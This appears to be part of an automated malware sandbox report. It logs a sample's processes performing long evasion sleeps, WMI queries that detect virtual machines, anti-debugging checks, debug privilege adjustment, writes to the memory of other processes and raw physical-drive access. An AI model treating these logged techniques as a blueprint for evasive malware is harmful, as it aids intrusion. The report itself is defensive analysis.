                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 7992Thread sleep count: 3310 > 30
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -99875s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 7992Thread sleep count: 6521 > 30
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -99751s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -99609s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -99500s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -99388s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -99265s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -99146s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -99019s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -98890s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -98781s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -98672s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -98562s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -98453s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -98342s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -98218s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -98109s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -97979s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -97859s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -97750s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -97631s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -97515s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -97390s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -97278s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1200000s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1199829s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1199704s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1199590s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1199469s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1199359s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1199250s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1199110s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1199000s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1198888s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1198781s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1198657s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1198532s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1198422s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1198297s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1198185s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1198078s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1197954s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1197836s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1197730s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1197586s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1197471s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1197344s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1197235s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1197094s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1196985s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1196875s >= -30000s
                    Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifLast function: Thread delayed
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifLast function: Thread delayed
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifLast function: Thread delayed
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifLast function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: 19_2_029858CC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,19_2_029858CC
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 99872Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 99749Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 99640Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 99530Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 99417Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 99297Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 99181Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 99071Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 98959Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 98843Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 98734Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 98624Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 98515Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 98399Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 98296Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 98176Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 98062Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 97945Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 97825Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 97718Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 97609Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 97499Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 97390Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 97281Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 97169Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 97062Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 96953Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 96843Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 96734Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 96624Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 96515Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1200000Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1199809Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1199687Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1199305Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1199172Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1197547Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1197435Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1197328Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1197219Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1197109Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1197000Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1196880Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1196766Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1196652Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1196544Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1196403Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1196229Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1196124Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1196012Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1195854Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1195728Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1195608Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1195470Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1195295Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1195143Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1194979Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1194835Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1194719Jump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 922337203685477
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 100000
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 99879
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 99765
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 99655
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 99546
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 99435
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 99325
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 99209
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 99078
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 98936
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 98822
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 98718
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 98606
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 98484
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 98374
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 98264
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 98156
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 98046
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 97936
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 97797
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 97685
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 97564
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 97424
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 97292
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 97180
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1200000
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1199865
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1199744
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1199618
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1199448
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1199323
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1199199
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1199043
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1198916
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1198764
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1198627
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1198467
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1198331
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 922337203685477
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 100000
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 99875
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 99751
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 99609
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 99500
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 99388
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 99265
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 99146
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 99019
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 98890
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 98781
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 98672
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 98562
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 98453
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 98342
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 98218
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 98109
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 97979
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 97859
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 97750
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 97631
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 97515
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 97390
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 97278
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1200000
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1199829
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1199704
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1199590
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1199469
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1199359
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1199250
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1199110
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1199000
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1198888
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1198781
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1198657
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1198532
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1198422
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1198297
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1198185
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1198078
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1197954
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1197836
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1197730
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1197586
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1197471
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1197344
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1197235
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1197094
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1196985
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifThread delayed: delay time: 1196875
                    Source: bwsiuvcU.pif, 00000019.00000002.1793876103.0000000029440000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000003.1711636457.000000002944F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq
                    Source: mshta.exe, 00000009.00000002.1863621793.0000019AC1767000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1858256707.0000019AC1766000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1856924692.0000019AC1757000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852117667.0000019AC1757000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1863133474.0000019AC16A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1863133474.0000019AC1716000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2529557915.0000021C3382B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2531528743.0000021C38E58000.00000004.00000020.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1496845420.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1496845420.00000000007AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: powershell.exe, 00000011.00000002.1635136687.0000029E32767000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}n
                    Source: Ucvuiswb.PIF, 00000018.00000002.1625890136.00000000005FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllvvX
                    Source: powershell.exe, 00000011.00000002.1635136687.0000029E3275E000.00000004.00000020.00020000.00000000.sdmp, Ucvuiswb.PIF, 0000001A.00000002.1711968278.00000000005DB000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556758276.00000000411C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: bwsiuvcU.pif, 00000017.00000002.1683295114.0000000041300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllaa
                    Source: C:\Users\user\AppData\Roaming\uc.exeAPI call chain: ExitProcess graph end nodegraph_19-38404
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifAPI call chain: ExitProcess graph end nodegraph_23-59625
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFAPI call chain: ExitProcess graph end nodegraph_24-27484
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifAPI call chain: ExitProcess graph end node
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_0040CE09
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,23_2_004019F0
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: 19_2_02997AC0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,19_2_02997AC0
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_0040ADB0 GetProcessHeap,HeapFree,23_2_0040ADB0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_0040CE09
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_0040E61C
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_00416F6A
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_2_004123F1 SetUnhandledExceptionFilter,23_2_004123F1
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_1_0040CE09
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_1_0040E61C
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_1_00416F6A
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 23_1_004123F1 SetUnhandledExceptionFilter,23_1_004123F1
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 25_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,25_2_0040CE09
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 25_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,25_2_0040E61C
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 25_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_00416F6A
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCode function: 25_2_004123F1 SetUnhandledExceptionFilter,25_2_004123F1
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Allocates memory in foreign processes
